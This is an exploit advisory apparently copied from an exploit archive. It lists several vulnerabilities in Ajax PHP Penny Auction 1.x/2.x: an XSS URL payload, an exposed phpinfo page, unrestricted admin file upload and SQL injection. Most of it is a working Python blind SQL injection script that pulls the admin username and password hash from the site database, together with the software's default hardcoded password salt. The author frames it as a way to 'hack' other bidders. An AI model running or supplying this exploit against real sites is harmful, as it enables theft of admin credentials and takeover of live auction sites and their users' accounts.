################################################################################ # Ajax PHP Penny Auction 1.x 2.x multiple Vulnerabilities # # Found by : Taha Hunter # #Info : # # Ajax PHP Penny Auction is one of the most proven and reliable # # Penny Auction software options available on the market. Based on a # # proprietary AJAX Streaming Engine which has four years of # # refinement and debugging under its belt in real live site action. # # # # # # website : http://www.ajaxphppennyauction.com/ # ################################################################################ XSS : http://[target]/forgotpasswd.php/"onmouseover='alert("XSS")'"> Phpinfo Information Disclosure : http://[target]/phpinfo.php Blind SQL Injection : #!/usr/bin/pyhon ################################################################################ # # # Ajax PHP Penny Auction version 1.x 2.x maybe oders # # item.php Blind SQL Injection Exploit # # if you can not beat autoclickers bots ==> hack them ;) # # Found & Coded by : Taha Hunter # # By default there is a table suffix called # # PHPAUCTIONXL_ added to all table names you can remove it if its needed # # The Password is like form md5($salt.$password) # # the salt is hardcoded in /includes/config.inc.php by default its value is # # $MD5_PREFIX = "This_Is_My_Random_String_For_The_MD5_Hash_Algorithm"; # # # #File Upload : # #if you get the admin password you can upload arbitrary files from # #http://[target]/admin/homepage.php there is no check for file extention # # # #MySQL Integer SQLi : # #http://[target]/admin/userbidhistoryauctions.php?id=65' # #you must first be logged as admin probably more vulnerablities still there.. # # # # # # Usage : python ajaxphpa.py -u http://www.target.com/item.php?id=[a valid id] # # # # # # Greetz to : Mehdi,Esac,Issam,Ali,Haitam,Imad and all friends ;) # # # # # # Contact me : vastmerdown@gmail.com # # # ################################################################################ import urllib2 from threading import Thread from time import sleep from optparse import OptionParser print "#######################################################################" print "# #" print "# Ajax PHP Penny Auction 1.x 2.x Blind SQL Injection Exploit #" print "# #" print "# Found & Coded by : Taha Hunter #" print "# #" print "# Contact me : vastmerdown@gmail.com #" print "# #" print "#python ajaxphpa.py -u http://www.target.com/item.php?id=[a valid id] #" print "# #" print "#######################################################################" print "" print "" name = "" admin_user = "" admin_password = "" strinng=[] def valid_test(url,type,val,sig): yep = urllib2.urlopen(url+type+sig+str(val)).read() if keyword in yep: return 1 else: return 0 def start_guessing(url,type,guess_type): total = 0 n_guess = 0 fixer = 0 max = 255 string ="" guess = int(max)/2 while(total != 9): if(valid_test(url, type,guess, '>')): fixer = guess n_guess = int(guess + ((max - fixer)/2)) if(valid_test(url,type, guess, '<')): max = guess n_guess = int(guess - ((max - fixer)/2)) if(valid_test(url, type,guess, '=')): if guess_type == 'len': return guess if guess_type == 'ascii': return chr(guess) guess = n_guess total += 1 def loader(id,strinng,url,type,guess_type,lenn): strinng[id] =start_guessing(url,type,guess_type) keyword = "item_watch.php?add=" db_len = "%20and%20Length((database()))" usage = 'usage: %prog -u http://[target]/item.php?id=[a valid id]' parser = OptionParser(usage=usage) parser.add_option("-u", action="store", type="string", dest="url1", help='"http://[target]/item.php?id=1080"') (options, args) = parser.parse_args() if(options.url1): url = options.url1 else: print "[-] Please insert a valid URL !" exit() print "[+] Connecting to site" req = urllib2.urlopen(url).read() if not keyword in req: print "[-] Please use a valide ID for the link !" exit() ''' #If you want to know DB Name print "[+] Finding Database Name Length" lenn = start_guessing(url,db_len,'len') print "[+] DB length is ==> "+str(lenn) print "[+] Finding Database Name" for a in range(lenn): strinng.append('1337') for i in range(1,lenn+1): db_name ="%20and%20ascii(substring((database())%2C"+str(i)+"%2C1))" Thread(target=loader,args=[i-1,strinng,url,db_name,'ascii',lenn]).start() while '1337' in strinng: sleep(3) #print strinng #incomment this line if you want to see progression continue for i in range(len(strinng)): name += strinng[i] print "[+] Database Name is ==> " + name ''' un_len = "%20and%20Length((select%20username%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1))" pass_len ="%20and%20Length((select%20password%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1))" print "[+] Finding Username Length may take a while..." lenn = start_guessing(url,un_len,'len') print "[+] Done ." del strinng[:] for a in range(lenn): strinng.append('1337') print "[+] Extracting Username may take a while..." for i in range(1,lenn+1): username = "%20and%20ascii(substring((select%20username%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1)%2C"+str(i)+"%2C1))" Thread(target=loader,args=[i-1,strinng,url,username,'ascii',lenn]).start() while '1337' in strinng: sleep(3) #print strinng # incomment this line if you want to see progression continue for i in range(len(strinng)): admin_user += strinng[i] print "[+] Found ! Username is ==> " +admin_user print "[+] Finding Password Length may take a while..." lenn = start_guessing(url,pass_len,'len') print "[+] Done ." del strinng[:] for a in range(lenn): strinng.append('1337') print "[+] Extracting Password may take a while..." for i in range(1,lenn+1): password = "%20and%20ascii(substring((select%20password%20from%20PHPAUCTIONXL_adminusers%20limit%200%2C1)%2C"+str(i)+"%2C1))" Thread(target=loader,args=[i-1,strinng,url,password,'ascii',lenn]).start() while '1337' in strinng: sleep(3) #print strinng #incomment this line if you want to see progression continue for i in range(len(strinng)): admin_password += strinng[i] print "[+] Found ! Password is ==> " +admin_password print "[+] Username => "+admin_user+" Password : => "+admin_password print "[+] Done Enjoy !"Брой прочитания на тази страница: 1206
Ajax PHP Penny Auction 1.x 2.x – Multiple Vulnerabilities